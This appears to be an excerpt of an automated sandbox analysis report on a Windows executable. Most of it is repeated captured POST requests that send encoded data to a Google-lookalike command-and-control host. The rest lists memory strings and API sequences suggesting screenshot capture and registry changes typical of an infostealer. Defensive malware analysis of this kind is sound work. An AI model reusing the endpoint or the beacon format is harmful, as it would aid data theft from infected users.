Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1

Source: Joe Sandbox View

IP Address: 104.21.80.1 104.21.80.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CCC4F0 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,

0_2_00CCC4F0

Source: global traffic

DNS traffic detected: DNS query: clientservices.sgoogleapis.observer

Source: unknown

HTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.000000000138E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.php
Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.php$$clientservices.sgoogleapis.observer
Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.php6o
Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.php8
Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.php;
Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.phpK
Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.phpk
Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.phpserver

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe

Code function: 0_2_00CB61F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,

0_2_00CB61F0

Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CB61F0	0_2_00CB61F0
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CBB700	0_2_00CBB700
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CF4197	0_2_00CF4197
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CEC82D	0_2_00CEC82D
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CE2D70	0_2_00CE2D70
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CB4EF0	0_2_00CB4EF0
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CECFB9	0_2_00CECFB9
Source: C:\Users\user\Desktop\6uHfmjGMfL.exe	Code function: 0_2_00CB51A0	0_2_00CB51A0
